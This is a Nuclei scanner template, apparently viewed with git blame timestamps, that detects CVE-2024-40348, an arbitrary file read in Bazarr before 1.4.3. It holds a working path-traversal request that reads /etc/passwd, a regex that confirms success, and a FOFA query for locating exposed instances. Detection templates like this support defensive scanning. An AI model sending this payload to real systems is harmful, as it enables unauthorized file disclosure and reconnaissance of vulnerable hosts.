nuclei-templates/http/cves/2024/CVE-2024-40348.yaml

60 lines
1.5 KiB
YAML
Raw Normal View History

id: CVE-2024-40348
2024-07-18 18:52:31 +00:00
info:
name: Bazarr < 1.4.3 - Arbitrary File Read
author: securityforeveryone
severity: high
description: |
Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
reference:
2024-07-21 08:51:48 +00:00
- https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
2024-07-18 18:52:31 +00:00
- https://www.bazarr.media/
- https://github.com/bigb0x/CVE-2024-40348
classification:
epss-score: 0.00043
epss-percentile: 0.09329
2024-07-18 18:52:31 +00:00
metadata:
2024-07-23 07:20:21 +00:00
verified: true
max-request: 2
2024-07-18 18:52:31 +00:00
vendor: morpheus65535
product: bazarr
fofa-query: title=="Bazarr" && icon_hash="-1983413099"
2024-07-22 09:34:07 +00:00
tags: cve,cve2024,bazarr,lfi
2024-07-21 08:51:48 +00:00
2024-07-18 18:52:31 +00:00
flow: http(1) && http(2)
http:
2024-07-23 07:20:21 +00:00
- method: GET
path:
- "{{BaseURL}}/login"
2024-07-18 18:52:31 +00:00
matchers:
- type: word
2024-07-21 08:51:48 +00:00
part: body
2024-07-18 18:52:31 +00:00
words:
- '<title>Bazarr</title>'
2024-07-23 07:20:21 +00:00
- 'content="Bazarr'
- 'window.Bazarr'
condition: or
2024-07-18 18:52:31 +00:00
internal: true
2024-07-23 07:20:21 +00:00
- method: GET
path:
- "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
2024-07-18 18:52:31 +00:00
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4b0a00483046022100c128400c428439af0515a4dcba55a151ea17919dc89be9512d17c913f651688b022100f867f890a69f2d0defc36e8eeddd85d923759f1db9f56bafeaffebbd039531cc:922c64590222798bb761d5b6d8e72950